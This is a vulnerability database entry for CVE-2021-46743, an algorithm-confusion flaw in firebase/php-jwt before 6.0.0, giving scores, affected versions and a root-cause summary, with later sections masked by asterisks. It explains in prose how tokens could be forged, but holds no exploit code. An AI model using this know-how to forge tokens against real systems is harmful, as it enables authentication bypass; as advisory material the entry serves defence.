Miggo Logo
Miggo Vulnerability Database
CVE-2021-46743

CVE-2021-46743:
Firebase PHP-JWT key/algorithm type confusion

9.1

CVSS Score
3.1

Basic Information

CVE ID
CVE-2021-46743
GHSA ID
GHSA-8xf4-w7qw-pjjw
EPSS Score
0.76202%
CWE
CWE-347
Published
3/30/2022
Updated
2/21/2023
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
firebase/php-jwtcomposer< 6.0.06.0.0

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from how pre-6.0.0 versions handled key selection. When multiple keys were provided (e.g., as an array/keyring), the 'kid' header dictated key selection, but there was no enforcement that the selected key matched the token's 'alg' header. This allowed algorithm confusion attacks. The decode function (JWT::decode) was modified in v6.0.0 to require a Key object binding keys to algorithms, confirming this was the focal point. The GitHub issue #351 and release notes explicitly reference this function's role in the vulnerability.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

In *ir***s* P*P-JWT ***or* *.*.*, *n *l*orit*m-*on*usion issu* (*.*., RS*** / *S***) *xists vi* t** ki* (*k* K*y I*) *****r, w**n multipl* typ*s o* k*ys *r* lo**** in * k*y rin*. T*is *llows *n *tt**k*r to *or** tok*ns t**t v*li**t* un**r t** in*orr*

Reasoning

T** vuln*r**ility st*ms *rom *ow pr*-*.*.* v*rsions **n*l** k*y s*l**tion. W**n multipl* k*ys w*r* provi*** (*.*., *s *n *rr*y/k*yrin*), t** 'ki*' *****r *i*t*t** k*y s*l**tion, *ut t**r* w*s no *n*or**m*nt t**t t** s*l**t** k*y m*t**** t** tok*n's '